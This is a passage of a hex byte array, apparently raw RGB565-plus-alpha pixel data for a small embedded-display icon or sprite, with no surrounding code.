0x40, 0x00, 0xff, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x20, 0x00, 0xff, 0x60, 0x23, 0xff, 0x60, 0x88, 0xff, 0x40, 0xd7, 0xfe, 0xe0, 0xf3, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xff, 0x01, 0xff, 0xff, 0x02, 0xff, 0xff, 0x02, 0xff, 0xff, 0x02, 0xff, 0xff, 0x21, 0xff, 0xff, 0x26, 0xff, 0xf7, 0x2b, 0xff, 0xf7, 0x30, 0xff, 0xf7, 0x2f, 0xff, 0xf7, 0x2c, 0xff, 0xf7, 0x28, 0xff, 0xff, 0x46, 0xff, 0xff, 0x44, 0xff, 0xff, 0x64, 0xff, 0xff, 0x63, 0xff, 0xff, 0x63, 0xff, 0xff, 0x62, 0xff, 0xff, 0x62, 0xff, 0xff, 0x61, 0xff, 0xff, 0x43, 0xff, 0xf7, 0x27, 0xff, 0xf7, 0x2b, 0xff, 0xf7, 0x2c, 0xff, 0xf7, 0x0b, 0xff, 0xf7, 0x09, 0xff, 0xf7, 0x08, 0xff, 0xf7, 0x07, 0xff, 0xff, 0x05, 0xff, 0xfe, 0xe3, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xff, 0x00, 0xef, 0xff, 0x40, 0xd3, 0xff, 0x60, 0x74, 0xff, 0x40, 0x0f, 0xff, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xc0, 0x04, 0xff, 0x20, 0xa0, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xff, 0x00, 0xff, 0xff, 0x04, 0xff, 0xff, 0x04, 0xff, 0xff, 0x04, 0xff, 0xff, 0x25, 0xff, 0xf7, 0x09, 0xff, 0xf7, 0x2d, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x31, 0xff, 0xf7, 0x31, 0xff, 0xf7, 0x2f, 0xff, 0xf7, 0x2d, 0xff, 0xf7, 0x4a, 0xff, 0xf7, 0x47, 0xff, 0xff, 0x65, 0xff, 0xff, 0x64, 0xff, 0xff, 0x64, 0xff, 0xff, 0x64, 0xff, 0xff, 0x45, 0xff, 0xf7, 0x48, 0xff, 0xf7, 0x29, 0xff, 0xf7, 0x2b, 0xff, 0xf7, 0x2e, 0xff, 0xf7, 0x2e, 0xff, 0xf7, 0x2e, 0xff, 0xf7, 0x0e, 0xff, 0xf7, 0x0c, 0xff, 0xf7, 0x09, 0xff, 0xfe, 0xe4, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xff, 0x40, 0x63, 0xff, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x40, 0x00, 0xff, 0x00, 0x00, 0xfe, 0xc0, 0x54, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe1, 0xff, 0xff, 0x00, 0xff, 0xf7, 0x08, 0xff, 0xf7, 0x07, 0xff, 0xff, 0x06, 0xff, 0xf7, 0x08, 0xff, 0xf7, 0x2e, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x54, 0xff, 0xf7, 0x53, 0xff, 0xf7, 0x52, 0xff, 0xf7, 0x51, 0xff, 0xf7, 0x51, 0xff, 0xf7, 0x4f, 0xff, 0xf7, 0x4d, 0xff, 0xf7, 0x4a, 0xff, 0xf7, 0x47, 0xff, 0xff, 0x65, 0xff, 0xff, 0x64, 0xff, 0xff, 0x45, 0xff, 0xf7, 0x49, 0xff, 0xf7, 0x2c, 0xff, 0xf7, 0x2d, 0xff, 0xf7, 0x2e, 0xff, 0xf7, 0x2f, 0xff, 0xf7, 0x30, 0xff, 0xf7, 0x30, 0xff, 0xf7, 0x10, 0xff, 0xf7, 0x0b, 0xff, 0xff, 0x05, 0xff, 0xff, 0x00, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0x33, 0xff, 0x80, 0x00, 0xff, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb6, 0x5f, 0x00, 0xc6, 0x7f, 0x00, 0xfe, 0xe0, 0x00, 0xfe, 0xe1, 0x80, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe1, 0xff, 0xff, 0x00, 0xff, 0xf7, 0x0b, 0xff, 0xf7, 0x0b, 0xff, 0xf7, 0x0a, 0xff, 0xf7, 0x0a, 0xff, 0xf7, 0x2f, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x77, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x54, 0xff, 0xf7, 0x52, 0xff, 0xf7, 0x51, 0xff, 0xf7, 0x50, 0xff, 0xf7, 0x50, 0xff, 0xf7, 0x4e, 0xff, 0xf7, 0x4a, 0xff, 0xf7, 0x47, 0xff, 0xff, 0x46, 0xff, 0xf7, 0x48, 0xff, 0xf7, 0x2c, 0xff, 0xf7, 0x2f, 0xff, 0xf7, 0x30, 0xff, 0xf7, 0x30, 0xff, 0xf7, 0x31, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x0d, 0xff, 0xff, 0x06, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xf8, 0xff, 0x20, 0x3b, 0xff, 0x40, 0x00, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb5, 0x76, 0x00, 0xff, 0xff, 0x00, 0xd6, 0x9a, 0x00, 0xbd, 0xf9, 0x00, 0xff, 0x45, 0x00, 0xef, 0x0d, 0x18, 0xff, 0x47, 0xbc, 0xfe, 0xe6, 0xf8, 0xfe, 0xc4, 0xff, 0xfe, 0xc3, 0xff, 0xfe, 0xe2, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe5, 0xff, 0xf7, 0x0c, 0xff, 0xf7, 0x0d, 0xff, 0xf7, 0x0c, 0xff, 0xf7, 0x0c, 0xff, 0xf7, 0x30, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x54, 0xff, 0xf7, 0x53, 0xff, 0xf7, 0x53, 0xff, 0xf7, 0x53, 0xff, 0xf7, 0x52, 0xff, 0xf7, 0x4f, 0xff, 0xf7, 0x4d, 0xff, 0xf7, 0x4c, 0xff, 0xf7, 0x2d, 0xff, 0xf7, 0x30, 0xff, 0xf7, 0x53, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x10, 0xff, 0xf6, 0xea, 0xff, 0xfe, 0xe4, 0xff, 0xfe, 0xe2, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xff, 0x00, 0xef, 0xff, 0x60, 0x94, 0xff, 0x00, 0x00, 0xff, 0x40, 0x00, 0xff, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xef, 0x5d, 0x00, 0xf7, 0xbe, 0x00, 0xd6, 0x9a, 0x08, 0xc6, 0x5a, 0x07, 0xff, 0x43, 0x20, 0xff, 0x21, 0xf0, 0xfe, 0xc7, 0xff, 0xf6, 0xcb, 0xff, 0xf6, 0xec, 0xff, 0xf6, 0xea, 0xff, 0xf6, 0xe7, 0xff, 0xfe, 0xe4, 0xff, 0xfe, 0xe2, 0xff, 0xf6, 0xe8, 0xff, 0xf7, 0x0f, 0xff, 0xf7, 0x31, 0xff, 0xf7, 0x30, 0xff, 0xf7, 0x30, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x77, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x54, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x54, 0xff, 0xf7, 0x53, 0xff, 0xf7, 0x51, 0xff, 0xf7, 0x30, 0xff, 0xf7, 0x30, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x0f, 0xff, 0xf6, 0xea, 0xff, 0xfe, 0xe5, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xff, 0x40, 0xd4, 0xff, 0x60, 0x04, 0xff, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd6, 0x9a, 0x00, 0xd6, 0x9a, 0x07, 0xce, 0x79, 0x17, 0xce, 0x79, 0x13, 0xd6, 0x79, 0x10, 0xee, 0xb4, 0x30, 0xf6, 0xc9, 0xb0, 0xf6, 0xed, 0xff, 0xf7, 0x10, 0xff, 0xf7, 0x10, 0xff, 0xf7, 0x0f, 0xff, 0xf6, 0xec, 0xff, 0xf6, 0xe9, 0xff, 0xf7, 0x0c, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x35, 0xff, 0xf7, 0x54, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x9a, 0xff, 0xf7, 0x9c, 0xff, 0xf7, 0x9c, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x77, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x53, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x10, 0xff, 0xf6, 0xeb, 0xff, 0xfe, 0xe5, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xc1, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0x7b, 0xfe, 0xc0, 0x13, 0xff, 0x00, 0x00, 0xff, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd6, 0xba, 0x00, 0xd6, 0x9a, 0x0f, 0xde, 0xdb, 0x28, 0xd6, 0x7a, 0x1b, 0xd6, 0xba, 0x1f, 0xde, 0xba, 0x2c, 0xde, 0xfd, 0x48, 0xee, 0xf3, 0xb8, 0xf6, 0xf0, 0xff, 0xf7, 0x12, 0xff, 0xf7, 0x13, 0xff, 0xf7, 0x12, 0xff, 0xf7, 0x10, 0xff, 0xf7, 0x10, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x77, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x35, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x0f, 0xff, 0xf6, 0xe8, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc1, 0xf8, 0xff, 0x02, 0x37, 0xff, 0x01, 0x00, 0xff, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd6, 0x7a, 0x00, 0xce, 0x59, 0x13, 0xde, 0xdb, 0x47, 0xde, 0xdb, 0x27, 0xde, 0xbb, 0x1f, 0xd6, 0x9e, 0x27, 0xef, 0x10, 0x8b, 0xf6, 0xea, 0xfb, 0xf6, 0xeb, 0xff, 0xf7, 0x12, 0xff, 0xf7, 0x35, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x77, 0xff, 0xf7, 0x77, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x30, 0xff, 0xf7, 0x2f, 0xff, 0xf7, 0x31, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x35, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x0e, 0xff, 0xf6, 0xe8, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xff, 0x20, 0xf0, 0xff, 0x81, 0x3f, 0xff, 0x60, 0x00, 0xff, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe6, 0xfc, 0x00, 0xe7, 0x1c, 0x08, 0xd6, 0xba, 0x33, 0xde, 0xbb, 0x30, 0xde, 0xfc, 0x23, 0xf7, 0x28, 0x80, 0xfe, 0xe6, 0xff, 0xf6, 0xc8, 0xff, 0xf6, 0xc7, 0xff, 0xf6, 0xec, 0xff, 0xf7, 0x12, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x77, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x9b, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x77, 0xff, 0xf7, 0x77, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x54, 0xff, 0xf7, 0x30, 0xff, 0xf7, 0x0d, 0xff, 0xf7, 0x0e, 0xff, 0xf7, 0x31, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x33, 0xff, 0xf6, 0xee, 0xff, 0xf6, 0xe7, 0xff, 0xfe, 0xe2, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xff, 0x00, 0xff, 0xff, 0x60, 0x3b, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xef, 0x5d, 0x00, 0xf7, 0xbe, 0x00, 0xde, 0xbb, 0x0b, 0xd6, 0xba, 0x18, 0xd6, 0xb9, 0x20, 0xee, 0xf1, 0x3b, 0xf6, 0xcd, 0x8b, 0xf6, 0xc9, 0xeb, 0xf6, 0xc8, 0xff, 0xf6, 0xc7, 0xff, 0xf6, 0xeb, 0xff, 0xf7, 0x10, 0xff, 0xf7, 0x11, 0xff, 0xf7, 0x12, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x0f, 0xff, 0xf7, 0x0c, 0xff, 0xf7, 0x0d, 0xff, 0xf7, 0x0e, 0xff, 0xf7, 0x10, 0xff, 0xf7, 0x12, 0xff, 0xf7, 0x11, 0xff, 0xf6, 0xea, 0xff, 0xfe, 0xc4, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xc4, 0xfe, 0xc0, 0x58, 0xff, 0x20, 0x18, 0xff, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xce, 0x39, 0x00, 0xff, 0xff, 0x00, 0xef, 0x7d, 0x00, 0xe7, 0x1c, 0x04, 0xd6, 0xba, 0x0b, 0xce, 0x79, 0x10, 0xd6, 0xdd, 0x1b, 0xbe, 0x9f, 0x1c, 0xf6, 0xe9, 0xaf, 0xfe, 0xc5, 0xff, 0xfe, 0xc5, 0xff, 0xf6, 0xea, 0xff, 0xf6, 0xeb, 0xff, 0xf6, 0xed, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x7a, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x54, 0xff, 0xf7, 0x54, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x0e, 0xff, 0xf7, 0x0a, 0xff, 0xf6, 0xea, 0xff, 0xf6, 0xeb, 0xff, 0xf7, 0x0e, 0xff, 0xf7, 0x10, 0xff, 0xf6, 0xed, 0xff, 0xf6, 0xc8, 0xff, 0xf6, 0xc8, 0x8c, 0xff, 0xe0, 0x00, 0xfe, 0xcc, 0x00, 0xfe, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xce, 0x79, 0x03, 0xde, 0xdb, 0x07, 0xde, 0xbb, 0x0b, 0xce, 0x9f, 0x0b, 0xff, 0x47, 0x7b, 0xfe, 0xe3, 0xff, 0xfe, 0xc3, 0xff, 0xfe, 0xc4, 0xff, 0xfe, 0xe5, 0xff, 0xfe, 0xe6, 0xff, 0xf6, 0xe7, 0xff, 0xf7, 0x10, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x79, 0xff, 0xf7, 0x78, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x54, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x31, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x30, 0xff, 0xf7, 0x0c, 0xff, 0xf6, 0xe8, 0xff, 0xf6, 0xe8, 0xff, 0xf6, 0xea, 0xff, 0xf6, 0xeb, 0xff, 0xf6, 0xeb, 0xff, 0xf6, 0xea, 0xff, 0xf6, 0xe9, 0xf8, 0xef, 0x0f, 0x40, 0xde, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xd6, 0x7a, 0x07, 0xde, 0xfb, 0x08, 0xde, 0xdb, 0x0b, 0xd6, 0xbc, 0x0c, 0xf7, 0x2c, 0x3f, 0xfe, 0xe2, 0xfb, 0xfe, 0xc3, 0xff, 0xfe, 0xc3, 0xff, 0xfe, 0xc4, 0xff, 0xfe, 0xc5, 0xff, 0xfe, 0xe6, 0xff, 0xfe, 0xe6, 0xff, 0xf7, 0x0e, 0xff, 0xf7, 0x32, 0xff, 0xf7, 0x34, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x55, 0xff, 0xf7, 0x33, 0xff, 0xf7, 0x31, 0xff, 0xf7, 0x2e, 0xff, 0xf7, 0x2f, 0xff, 0xf7, 0x2f, 0xff, 0xf7, 0x0f, 0xff, 0xf7, 0x0e, 0xff, 0xf7, 0x0d, 0xff, 0xf7, 0x0c, 0xff, 0xfe, 0xe6, 0xff, 0xfe, 0xe5, 0xff, 0xfe, 0xe5, 0xff, 0xfe, 0xe6, 0xff, 0xfe, 0xc6, 0xff, 0xfe, 0xc6, 0xff, 0xfe, 0xc6, 0xff, 0xff, 0x04, 0xf0, 0xff, 0xc0, 0x08, 0xff, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xd6, 0x9a, 0x07, 0xd6, 0x7a, 0x10, 0xd6, 0x7a, 0x18, 0xce, 0x7a, 0x17, 0xee, 0xf2, 0x2f, 0xf6, 0xc9, 0x6c, 0xfe, 0xc6, 0x8c, 0xfe, 0xc5, 0xb3, 0xfe, 0xc5, 0xff, 0xfe, 0xc6, 0xff, 0xf6, 0xc7, 0xff, 0xf6, 0xea, 0xff, 0xf7, 0x0f, 0xff, 0xf7, 0x12, 0xff, 0xf7, 0x35, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x58, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x56, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 0xf7, 0x57, 0xff, 